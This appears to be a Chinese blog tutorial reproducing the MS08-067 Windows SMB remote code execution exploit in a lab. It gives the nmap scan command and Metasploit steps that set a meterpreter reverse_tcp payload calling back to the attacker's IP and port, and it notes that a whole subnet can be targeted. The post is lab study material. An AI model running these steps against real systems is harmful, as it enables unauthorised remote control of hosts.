2. 程式人生 > 其它 >MS-08-067 windows smb服務 遠端命令執行漏洞

MS-08-067 windows smb服務 遠端命令執行漏洞

阿新 發佈:2022-03-29

漏洞概要

MS-08-067是Windows平臺中smb服務445埠的遠端程式碼執行漏洞
利用成功可以遠端控制主機
影響範圍為:windows2000、xp、server 2003、server 2008、甚至早些版本的Win7

實驗場景

攻擊機:kali2022msfconsole利用
靶機:windows xp

漏洞利用

使用ifconfigipconfig獲取攻擊機和靶機的IP地址
攻擊機IP:172.16.1.117

靶機IP:172.16.1.116

nmap的預設指令碼在/usr/share/nmap/scripts,ls -l| grep 08-67篩選漏洞相關模組

使用nmap的漏洞掃描指令碼smb-vuln-ms08-067

掃描靶機是否存在ms-08-067漏洞

nmap -script smb-vuln-ms08-067 -p 445 172.16.1.116 -n


發現存在漏洞,使用msfconsole進行利用
msfconsole啟動漏洞平臺

查詢漏洞利用指令碼

search ms08_067


使用漏洞利用模組,並使用show options檢視漏洞利用模組配置引數

use exploit/windows/smb/ms08_067_netapi
show options

Requiredyes是必須要設定的引數

在最新版kali中,對常見的漏洞自動選擇了合適的payload,例如這裡的windows/meterpreter/reverse_tcp

,並且配置自動配置了反彈會話的IP地址和埠
就是我們本機的IP和埠

如果不是這個payload需要我們手動設定

set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.1.117
set LPORT 4444


觀察我們必須設定目標的IP地址,就是RHOSTS,這裡如果是RHOST是隻可以設定一個IP地址,如果是RHOSTS則可以設定一個網段,對一個網段進行攻擊

相關推薦

MS-08-067 windows smb服務 遠端命令執行漏洞

漏洞概要 MS-08-067Windows平臺中smb服務445埠的遠端程式碼執行漏洞 利用成功可以遠端控制主機

WinRM服務遠端命令執行

WinRM服務簡介 WinRM是WindowsRemoteManagementd(win遠端管理)的簡稱。基於Web服務管理(WS-Management)標準,使用80埠或者443埠。這樣一來,我們就可以在對方有設定防火牆的情況下遠端管理這臺伺服器了。

Redis遠端命令執行漏洞復現

本文首發於我的個人部落格,記錄了我在實驗室學習滲透測試所做的第二個漏洞復現,全部過程記錄在此,以便後續檢視,同時也希望本文能對您有所幫助。

fastjson遠端命令執行漏洞復現

fastjson遠端命令執行漏洞復現 使用vulhub提供的docker環境:https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce

Maccms8.x 遠端命令執行漏洞分析

前言 復現原始碼地址:https://github.com/yaofeifly/Maccms8.x 除錯中xdebug突然自動停止,新增下httpd.conf中的FcgidIOTimeout

Weblogic未授權遠端命令執行漏洞(CVE-2020-14882&CVE-2020-14883)復現

Weblogic是Oracle公司推出的J2EE應用伺服器,CVE-2020-14882允許未授權的使用者繞過管理控制檯的許可權驗證訪問後臺,CVE-2020-14883允許後臺任意使用者通過HTTP協議執行任意命令。使用這兩個漏洞組成的利用鏈,可通

CVE-2020-16898 "Bad Neighbor " Windows TCP/IP遠端程式碼執行漏洞學習

  一、該漏洞和router advertisement相關,先來學習一下相關協議;   IPV4時代,如果想探測其他主機是否存活,要麼用ARP(一般是局域內網),要麼用ICMP(一般是公網)。但是在IPV6時代改用了Neighbor Discovery Pro

Weblogic遠端命令執行漏洞復現(CVE-2020-14645)

影響版本 Oracle WebLogic Server 10.3.6.0.0 Oracle WebLogic Server 12.1.3.0.0 Oracle WebLogic Server 12.2.1.3.0

CVE-2018-1273 Spring Data Commons 遠端命令執行漏洞復現

一、漏洞描述 Spring Data是一個用於簡化資料庫訪問,並支援雲服務的開源框架,Spring Data Commons是Spring Data下所有子專案共享的基礎框架。Spring Data Commons 在2.0.5及以前版本中,存在一處SpEL表示式注入漏洞

Apache SSI 遠端命令執行漏洞

一.漏洞介紹 SSI 注入全稱Server-Side Includes Injection,即服務端包含注入。 SSI是嵌入HTML頁面中的指令,在頁面被提供時由伺服器進行運算,以對現有HTML頁面增加動態生成的內容,而無須通過CGI程式提供其整個

Apache Solr 遠端命令執行漏洞復現(CVE-2019-0193)

一.漏洞介紹 Apache Solr 是一個開源的搜尋伺服器。Solr 使用 Java 語言開發,主要基於 HTTP 和 Apache Lucene 實現。此次漏洞出現在Apache Solr的DataImportHandler,該模組是一個可選但常用的模組,用於從資料庫

Spring Security OAuth2 遠端命令執行漏洞

Spring Security OAuth2 遠端命令執行漏洞 Spring Security OAuth2 遠端命令執行漏洞 (CVE-2016-4977)

Samba遠端命令執行漏洞復現

Linux版永恆之藍 0x00 漏洞概述 編號CVE-2017-7494。 Samba允許連線一個遠端的命名管道,在連線前會呼叫is_known_pipename()函式驗證管道名稱是否合法。

億賽通 電子文件安全管理系統遠端命令執行漏洞 CNVD-2021-26058

FOFA語句:title=\"電子文件安全管理系統\" exp附上 1 import re 2 importrequests 3 requests.packages.urllib3.disable_warnings()

Struts2 S2-061 遠端命令執行漏洞(CVE-2020-17530)復現

Struts2 S2-061 遠端命令執行漏洞(CVE-2020-17530)復現 0x00 漏洞介紹 Struts2框架是一個用於開發Java EE網路應用程式的開放原始碼網頁應用程式架構。它利用並延伸了Java Servlet API,鼓勵開發者採用MVC架構。Stru

漏洞分析:VIVOTEK棧溢位遠端命令執行漏洞

漏洞分析:VIVOTEK棧溢位遠端命令執行漏洞   這是/usr/sbin/httpd中,存在的對POST請求中Content-Length欄位處理不當導致的棧溢位,攻擊者通過構造惡意資料包實現RCE,下面對這個漏洞進行復現和分析,環境使用IoT

CVE-2020-10977-GITLAB CE/EE 任意檔案讀取導致遠端命令執行漏洞-環境搭建及完整復現圖文詳細筆記

漏洞環境搭建-CENTOS7 1.安裝依賴軟體 yum -y install policycoreutils openssh-server openssh-clients postfix

IOT入門---------第一個cve復現(CVE-2020-24581 D-Link DSL-2888A 遠端命令執行漏洞分析)

漏洞描述: D-Link DSL-2888A AU_2.31_V1.1.47ae55之前版本存在安全漏洞,該漏洞源於包含一個execute cmd.cgi特性(不能通過web使用者介面訪問),該特性允許經過身份驗證的使用者執行作業系統命令。在該版本韌體中同時

Spring Framework 遠端命令執行漏洞(CVE-2022-22965)

Spring Framework 遠端命令執行漏洞 (CVE-2022-22965)  近日,Spring 官方 GitHub issue中提到了關於 Spring Core 的遠端命令執行漏洞,該漏洞廣泛存在於Spring 框架以及衍生的框架中。

Spring Framework 遠端命令執行漏洞復現(CVE-2022-22965)

Spring Framework 遠端命令執行漏洞復現(CVE-2022-22965) 漏洞描述:   Spring core是Spring系列產品中用來負責發現、建立並處理bean之間的關係的一個工具包,是一個包含Spring框架基本的核心工具包,Spring其他元